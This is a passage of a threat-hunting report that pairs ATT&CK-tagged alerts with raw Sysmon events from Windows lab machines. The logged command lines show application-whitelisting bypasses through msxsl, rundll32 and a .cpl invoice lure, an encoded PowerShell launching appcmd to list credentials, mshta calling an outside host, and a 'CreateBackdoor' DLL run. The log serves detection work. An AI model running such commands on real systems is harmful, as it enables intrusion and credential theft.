<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D7B0-5CE6-0000-001077C56D00</Data>
<Data Name=""ParentProcessId"">3388</Data>
<Data Name=""ParentImage"">\\vboxsrv\HTools\msxsl.exe</Data>
<Data Name=""ParentCommandLine"">msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
</TimeCreated>
<EventRecordID>16392</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
<Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
<Data Name=""ProcessId"">1416</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
</TimeCreated>
<EventRecordID>16392</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
<Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
<Data Name=""ProcessId"">1416</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
</TimeCreated>
<EventRecordID>16392</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
<Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
<Data Name=""ProcessId"">1416</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:20:49.443464Z"">
</TimeCreated>
<EventRecordID>16513</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:20:49.261</Data>
<Data Name=""ProcessGuid"">365ABB72-55F1-5CD8-0000-0010781C3300</Data>
<Data Name=""ProcessId"">2392</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-55F1-5CD8-0000-00108A153300</Data>
<Data Name=""ParentProcessId"">3668</Data>
<Data Name=""ParentImage"">C:\Windows\System32\ftp.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\ftp.exe&quot; -s:c:\users\ieuser\appdata\local\temp\ftp.txt</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.063277Z"">
</TimeCreated>
<EventRecordID>5946</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.023</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010A6B1FF00</Data>
<Data Name=""ProcessId"">1508</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
</TimeCreated>
<EventRecordID>4864</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ProcessId"">4884</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ParentProcessId"">4356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
</TimeCreated>
<EventRecordID>4864</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ProcessId"">4884</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ParentProcessId"">4356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
</TimeCreated>
<EventRecordID>4864</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ProcessId"">4884</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ParentProcessId"">4356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) ran process C:\Windows\System32\mshta.exe and initiated a network connection from hostname ( IEWIN7..home ) and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:33:00.140358Z"">
</TimeCreated>
<EventRecordID>4131</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3628"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 06:58:40.518</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49704</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">105.73.6.112</Data>
<Data Name=""DestinationHostname"">aka112.inwitelecom.net</Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
</TimeCreated>
<EventRecordID>243532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
<Data Name=""ProcessId"">3300</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
